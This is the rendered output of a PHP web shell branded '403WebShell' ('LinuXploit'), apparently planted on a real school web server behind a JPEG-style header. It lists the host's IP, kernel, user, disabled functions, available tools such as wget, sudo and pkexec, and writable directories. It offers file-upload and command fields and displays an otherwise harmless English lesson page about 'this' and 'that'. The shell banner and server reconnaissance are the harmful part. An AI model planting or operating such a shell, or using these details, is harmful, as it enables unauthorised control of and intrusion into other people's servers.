????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.226.169.66
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelB/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelB/Category1/LevelBCat1Lesson33.html
<!doctype html>
<html>
    <head>
        <title>Fill in the blanks using 'this and that'</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>

        <script>
            function page_preLoad()
            {
                s_setDeviceTypeLevelCategoryLastLesson(Level.B, Category.No1);
                
                s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                s_setHeaderTable('id_tblHeader', s_title_page, s_getSubTitle(Level.B, Category.No1, 33), true, true);
                s_setFooterTable('id_tblFooter', true, true, false, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2'];
                var ids_boxes = ['id_TdSpanWordThis1Box', 'id_TdSpanWordThat1Box', 'id_TdSpanWordThis2Box', 'id_TdSpanWordThat2Box', 'id_TdSpanWordThis3Box', 'id_TdSpanWordThat3Box', 'id_TdSpanWordThis4Box', 'id_TdSpanWordThat4Box'];
                var ids_options = ['id_tdWordThis1', 'id_tdWordThat1', 'id_tdWordThis2', 'id_tdWordThat2', 'id_tdWordThis3', 'id_tdWordThat3', 'id_tdWordThis4', 'id_tdWordThat4'];
                var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10', 'id_td_text11', 'id_td_text12', 'id_td_text13', 'id_td_text14', 'id_td_text15', 'id_td_text15', 'id_td_text16'];
                var ids_spans = ['id_SpanWordThis1', 'id_SpanWordThat1', 'id_SpanWordThis2', 'id_SpanWordThat2', 'id_SpanWordThis3', 'id_SpanWordThat3', 'id_SpanWordThis4', 'id_SpanWordThat4'];
                var ids_All = ids_headings.concat(ids_boxes, ids_options, ids_texts);
                
                s_adjust_fontSize_for_ids_all_devices(ids_All, 80);
                
                s_init_dropBox_tds_withOUT_drag_here(ids_boxes);
                s_init_dropping_spans(ids_spans);
                
                s_hideAllExceptFirstElement('id_SpanWordThis', 4);
                s_hideAllExceptFirstElement('id_SpanWordThat', 4);
                s_set_all_draggble_to_false_except_first_element('id_tdWordThis', 4);
                s_set_all_draggble_to_false_except_first_element('id_tdWordThat', 4);
            }
        
            function page_onLoad()
            {
                s_setTablesHeightsForIE();
            }
        
            function btnPrevious_click()
            {
                window.location = "LevelBCat1Lesson32.html";
            }

            function btnNext_click()
            {
                window.location = "LevelBCat1Lesson34.html";
            }        
        
            function btnHome_click()
            {
                s_btnHomeCategories_click('LevelB');
            }

            function btnLevel_click(levelName)
            {
                var urlString = "Lessons.html?" + levelName;

                var urlEncoded = encodeURI(urlString);

                window.location = urlEncoded;
            }
        
            function DragDrop(id_dropBox, text, ids_array)
            {
                if (s_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    s_setTextAndBackgroundColorToGreenAndIsMovedTrue(s_currentDropingId, id_dropBox);
                    
                    if (text == 'This')
                    {
                        showNextThisWord()
                    }
                    else if (text == 'That')
                    {
                        showNextThatWord()
                    }
                    
                    isAllInfosMovedShowClapsAnimation();
                    
                    s_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    s_resetCurrentDroppingPosition(id_dropBox);
                }
            }
        
            function showNextThisWord()
            {
                s_unHideNextElementNew2('id_SpanWordThis', 'id_tdWordThis', 4);
            }
        
            function showNextThatWord()
            {                
                s_unHideNextElementNew2('id_SpanWordThat', 'id_tdWordThat', 4);
            }
        
            function isAllInfosMovedShowClapsAnimation()
            {
                var ids_boxes = ['id_TdSpanWordThis1Box', 'id_TdSpanWordThat1Box', 'id_TdSpanWordThis2Box', 'id_TdSpanWordThat2Box', 'id_TdSpanWordThis3Box', 'id_TdSpanWordThat3Box', 'id_TdSpanWordThis4Box', 'id_TdSpanWordThat4Box'];
                
                s_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
            }
        
        </script>
    </head>

    <body onload="page_onLoad()">
        <div id="s_id_div_message"></div>
        
    <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
        <tr height="8%">
            <td>
                <div id="id_tblHeader"></div>
            </td>
        </tr>
        <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
            <td>
                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
                    <tr>
                        <td>
                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-top:none; border-left:none">
                                  <tr height="5%">
                                      <td style="border-bottom:none; border-right:none">
                                          <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                              <tr>
                                                  <td id="id_td_heading1" width="100%" class="s_style_heading">
                                                      Fill the blanks with the following words:
                                                  </td>
                                              </tr>
                                          </table>
                                      </td>                    
                                  </tr>
                                  <tr height="*">
                                    <td style="border-top:0px; border-right:none; border-bottom:none">
                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                          <tr height="100%">
                                            <td style="border-right:none">
                                                <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                  <tr height="7%">
                                                    <td style="border-left:none; border-right:none">
                                                        <table id="id_tblOptionsSet3" border="0"  width="100%" height="100%" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_heading2" width="*" class="s_style_heading_options">Options:</td>
                                                                <td id="id_tdWordThis1" class="s_style_draggable_text" width="10%" draggable="true" ondragstart="s_dragStartNew(event)" align="center">
                                                                    <span id="id_SpanWordThis1" class="cls_SpanWordThis1">This</span>
                                                                </td>
                                                                <td id="id_tdWordThat1" class="s_style_draggable_text" width="10%" draggable="true" ondragstart="s_dragStartNew(event)" align="center">
                                                                    <span id="id_SpanWordThat1" class="cls_SpanWordThat1">That</span>
                                                                </td>
                                                                <td id="id_tdWordThis2" class="s_style_draggable_text" width="10%" draggable="true" ondragstart="s_dragStartNew(event)" align="center">
                                                                    <span id="id_SpanWordThis2" class="cls_SpanWordThis2">This</span>
                                                                </td>
                                                                <td id="id_tdWordThat2" class="s_style_draggable_text" width="10%" draggable="true" ondragstart="s_dragStartNew(event)" align="center">
                                                                    <span id="id_SpanWordThat2" class="cls_SpanWordThat2">That</span>
                                                                </td>
                                                                <td id="id_tdWordThis3" class="s_style_draggable_text" width="10%" draggable="true" ondragstart="s_dragStartNew(event)" align="center">
                                                                    <span id="id_SpanWordThis3" class="cls_SpanWordThis3">This</span>
                                                                </td>
                                                                <td id="id_tdWordThat3" class="s_style_draggable_text" width="10%" draggable="true" ondragstart="s_dragStartNew(event)" align="center">
                                                                    <span id="id_SpanWordThat3" class="cls_SpanWordThat3">That</span>
                                                                </td>
                                                                <td id="id_tdWordThis4" class="s_style_draggable_text" width="10%" draggable="true" ondragstart="s_dragStartNew(event)" align="center">
                                                                    <span id="id_SpanWordThis4" class="cls_SpanWordThis4">This</span>
                                                                </td>
                                                                <td id="id_tdWordThat4" class="s_style_draggable_text" width="10%" draggable="true" ondragstart="s_dragStartNew(event)" align="center">
                                                                    <span id="id_SpanWordThat4" class="cls_SpanWordThat4">That</span>
                                                                </td>
                                                          </tr>
                                                        </table>
                                                    </td>
                                                  </tr>
                                                  <tr height="*">
                                                    <td style="border-left: 0px; border-right: 0px; border-bottom: 0px">
                                                        <table width="100%" height="100%"  border="0" cellspacing="2%" cellpadding="0">
                                                          <tr id="id_tr_spanWordThis1Box" height="12%"
                                                              ondragover="s_highlight('id_TdSpanWordThis1Box'); s_allowDrop_web(event)"
                                                              ondragleave="s_un_highlight('id_TdSpanWordThis1Box')"
                                                              ondrop="DragDrop('id_TdSpanWordThis1Box', 'This', ['id_SpanWordThis1', 'id_SpanWordThis2', 'id_SpanWordThis3', 'id_SpanWordThis4'])">
                                                            <td width = "100%">
                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                    <tr>
                                                                        <td id="id_td_text1" class="s_style_content_normal" width="15%" align="right">1:&nbsp;</td>
                                                                        <td width="20%" align="center">
                                                                            <img id="id_img_bus" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson33/bus.png" width="80%" draggable="false">
                                                                        </td>
                                                                        <td id="id_TdSpanWordThis1Box" class="s_style_droppable_dash" width="15%" align="center">____</td>
                                                                        <td id="id_td_text2" class="s_style_content_normal" width = "*">&nbsp;is a bus.</td>
                                                                    </tr>
                                                                </table>
                                                            </td>
                                                          </tr>
                                                          <tr id="id_tr_spanWordThat1Box" height="12%"
                                                              ondragover="s_highlight('id_TdSpanWordThat1Box'); s_allowDrop_web(event)"
                                                              ondragleave="s_un_highlight('id_TdSpanWordThat1Box')"
                                                              ondrop="DragDrop('id_TdSpanWordThat1Box', 'That', ['id_SpanWordThat1', 'id_SpanWordThat2', 'id_SpanWordThat3', 'id_SpanWordThat4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text3" class="s_style_content_normal" width="15%" align="right">2:&nbsp;</td>
                                                                          <td id="id_TdSpanWordThat1Box" class="s_style_droppable_dash" width="15%" align="center">____</td>
                                                                          <td id="id_td_text4" class="s_style_content_normal" width = "*">&nbsp;is a car.</td>
                                                                          <td width="40%" align="left">
                                                                              <img id="id_img_car" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson33/car.png" width="40%" draggable="false">
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_spanWordThis2Box" height="12%"
                                                              ondragover="s_highlight('id_TdSpanWordThis2Box'); s_allowDrop_web(event)"
                                                              ondragleave="s_un_highlight('id_TdSpanWordThis2Box')"
                                                              ondrop="DragDrop('id_TdSpanWordThis2Box', 'This', ['id_SpanWordThis1', 'id_SpanWordThis2', 'id_SpanWordThis3', 'id_SpanWordThis4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text5" class="s_style_content_normal" width="15%" align="right">3:&nbsp;</td>
                                                                          <td width="20%" align="center">
                                                                              <img id="id_img_van" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson33/van.png" width="75%" draggable="false">
                                                                          </td>
                                                                          <td id="id_TdSpanWordThis2Box" class="s_style_droppable_dash" width="15%" align="center">____</td>
                                                                          <td id="id_td_text6" class="s_style_content_normal" width = "*">&nbsp;is a van.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_spanWordThat2Box" height="12%"
                                                              ondragover="s_highlight('id_TdSpanWordThat2Box'); s_allowDrop_web(event)"
                                                              ondragleave="s_un_highlight('id_TdSpanWordThat2Box')"
                                                              ondrop="DragDrop('id_TdSpanWordThat2Box', 'That', ['id_SpanWordThat1', 'id_SpanWordThat2', 'id_SpanWordThat3', 'id_SpanWordThat4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text7" class="s_style_content_normal" width="15%" align="right">4:&nbsp;</td>
                                                                          <td id="id_TdSpanWordThat2Box" class="s_style_droppable_dash" width="15%" align="center">____</td>
                                                                          <td id="id_td_text8" class="s_style_content_normal" width = "*">&nbsp;is a truck.</td>
                                                                          <td width="40%" align="left">
                                                                              <img id="id_img_truck" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson33/truck.png" width="40%" draggable="false">
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_spanWordThis3Box" height="12%"
                                                              ondragover="s_highlight('id_TdSpanWordThis3Box'); s_allowDrop_web(event)"
                                                              ondragleave="s_un_highlight('id_TdSpanWordThis3Box')"
                                                              ondrop="DragDrop('id_TdSpanWordThis3Box', 'This', ['id_SpanWordThis1', 'id_SpanWordThis2', 'id_SpanWordThis3', 'id_SpanWordThis4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text9" class="s_style_content_normal" width="15%" align="right">5:&nbsp;</td>
                                                                          <td width="20%" align="center">
                                                                              <img id="id_img_ship" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson33/ship.png" width="80%" draggable="false">
                                                                          </td>
                                                                          <td id="id_TdSpanWordThis3Box" class="s_style_droppable_dash" width="15%" align="center">____</td>
                                                                          <td id="id_td_text10" class="s_style_content_normal" width = "*">&nbsp;is a ship.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_spanWordThat3Box" height="12%"
                                                              ondragover="s_highlight('id_TdSpanWordThat3Box'); s_allowDrop_web(event)"
                                                              ondragleave="s_un_highlight('id_TdSpanWordThat3Box')"
                                                              ondrop="DragDrop('id_TdSpanWordThat3Box', 'That', ['id_SpanWordThat1', 'id_SpanWordThat2', 'id_SpanWordThat3', 'id_SpanWordThat4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text11" class="s_style_content_normal" width="15%" align="right">6:&nbsp;</td>
                                                                          <td id="id_TdSpanWordThat3Box" class="s_style_droppable_dash" width="15%" align="center">____</td>
                                                                          <td id="id_td_text12" class="s_style_content_normal" width = "*">&nbsp;is a motorbike.</td>
                                                                          <td width="35%" align="left">
                                                                              <img id="id_img_bike" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson33/motorBike.png" width="50%" draggable="false">
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_spanWordThis4Box" height="12%"
                                                              ondragover="s_highlight('id_TdSpanWordThis4Box'); s_allowDrop_web(event)"
                                                              ondragleave="s_un_highlight('id_TdSpanWordThis4Box')"
                                                              ondrop="DragDrop('id_TdSpanWordThis4Box', 'This', ['id_SpanWordThis1', 'id_SpanWordThis2', 'id_SpanWordThis3', 'id_SpanWordThis4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text13" class="s_style_content_normal" width="15%" align="right">7:&nbsp;</td>
                                                                          <td width="20%" align="center">
                                                                              <img id="id_img_cycle" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson33/cycle.png" width="80%" draggable="false">
                                                                          </td>
                                                                          <td id="id_TdSpanWordThis4Box" class="s_style_droppable_dash" width="15%" align="center">____</td>
                                                                          <td id="id_td_text14" class="s_style_content_normal" width = "*">&nbsp;is a cycle.</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_spanWordThat4Box" height="12%"
                                                              ondragover="s_highlight('id_TdSpanWordThat4Box'); s_allowDrop_web(event)"
                                                              ondragleave="s_un_highlight('id_TdSpanWordThat4Box')"
                                                              ondrop="DragDrop('id_TdSpanWordThat4Box', 'That', ['id_SpanWordThat1', 'id_SpanWordThat2', 'id_SpanWordThat3', 'id_SpanWordThat4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text15" class="s_style_content_normal" width="15%" align="right">8:&nbsp;</td>
                                                                          <td id="id_TdSpanWordThat4Box" class="s_style_droppable_dash" width="15%" align="center">____</td>
                                                                          <td id="id_td_text16" class="s_style_content_normal" width = "*">&nbsp;is an airplane.</td>
                                                                          <td width="40%" align="left">
                                                                              <img id="id_img_airPlane" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson33/airPlane.png" width="50%" draggable="false">
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="*">
                                                              <td></td>
                                                        </tr>
                                                        </table>
                                                     </td>
                                                  </tr>
                                                </table>
                                            </td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                            </table>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
        <tr height="8%">
            <td>
                <div id="id_tblFooter"></div>
            </td>
        </tr>
    </table>

    <script>
            page_preLoad();
            
            new webkit_draggable('id_SpanWordThis1', {handle : 'id_tdWordThis1', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordThis2', {handle : 'id_tdWordThis2', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordThis3', {handle : 'id_tdWordThis3', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordThis4', {handle : 'id_tdWordThis4', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});

            new webkit_draggable('id_SpanWordThat1', {handle : 'id_tdWordThat1', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordThat2', {handle : 'id_tdWordThat2', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordThat3', {handle : 'id_tdWordThat3', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordThat4', {handle : 'id_tdWordThat4', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            
            
            webkit_drop.add('id_tr_spanWordThis1Box', {onOver : function(){s_highlight('id_TdSpanWordThis1Box')}, onOut : function(){s_un_highlight('id_TdSpanWordThis1Box')}, onDrop : function(){DragDrop('id_TdSpanWordThis1Box', 'This', ['id_SpanWordThis1', 'id_SpanWordThis2', 'id_SpanWordThis3', 'id_SpanWordThis4'])}});
            webkit_drop.add('id_tr_spanWordThis2Box', {onOver : function(){s_highlight('id_TdSpanWordThis2Box')}, onOut : function(){s_un_highlight('id_TdSpanWordThis2Box')}, onDrop : function(){DragDrop('id_TdSpanWordThis2Box', 'This', ['id_SpanWordThis1', 'id_SpanWordThis2', 'id_SpanWordThis3', 'id_SpanWordThis4'])}});
            webkit_drop.add('id_tr_spanWordThis3Box', {onOver : function(){s_highlight('id_TdSpanWordThis3Box')}, onOut : function(){s_un_highlight('id_TdSpanWordThis3Box')}, onDrop : function(){DragDrop('id_TdSpanWordThis3Box', 'This', ['id_SpanWordThis1', 'id_SpanWordThis2', 'id_SpanWordThis3', 'id_SpanWordThis4'])}});
            webkit_drop.add('id_tr_spanWordThis4Box', {onOver : function(){s_highlight('id_TdSpanWordThis4Box')}, onOut : function(){s_un_highlight('id_TdSpanWordThis4Box')}, onDrop : function(){DragDrop('id_TdSpanWordThis4Box', 'This', ['id_SpanWordThis1', 'id_SpanWordThis2', 'id_SpanWordThis3', 'id_SpanWordThis4'])}});
            
            webkit_drop.add('id_tr_spanWordThat1Box', {onOver : function(){s_highlight('id_TdSpanWordThat1Box')}, onOut : function(){s_un_highlight('id_TdSpanWordThat1Box')}, onDrop : function(){DragDrop('id_TdSpanWordThat1Box', 'That', ['id_SpanWordThat1', 'id_SpanWordThat2', 'id_SpanWordThat3', 'id_SpanWordThat4'])}});
            webkit_drop.add('id_tr_spanWordThat2Box', {onOver : function(){s_highlight('id_TdSpanWordThat2Box')}, onOut : function(){s_un_highlight('id_TdSpanWordThat2Box')}, onDrop : function(){DragDrop('id_TdSpanWordThat2Box', 'That', ['id_SpanWordThat1', 'id_SpanWordThat2', 'id_SpanWordThat3', 'id_SpanWordThat4'])}});
            webkit_drop.add('id_tr_spanWordThat3Box', {onOver : function(){s_highlight('id_TdSpanWordThat3Box')}, onOut : function(){s_un_highlight('id_TdSpanWordThat3Box')}, onDrop : function(){DragDrop('id_TdSpanWordThat3Box', 'That', ['id_SpanWordThat1', 'id_SpanWordThat2', 'id_SpanWordThat3', 'id_SpanWordThat4'])}});
            webkit_drop.add('id_tr_spanWordThat4Box', {onOver : function(){s_highlight('id_TdSpanWordThat4Box')}, onOut : function(){s_un_highlight('id_TdSpanWordThat4Box')}, onDrop : function(){DragDrop('id_TdSpanWordThat4Box', 'That', ['id_SpanWordThat1', 'id_SpanWordThat2', 'id_SpanWordThat3', 'id_SpanWordThat4'])}});
            
    </script>

    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit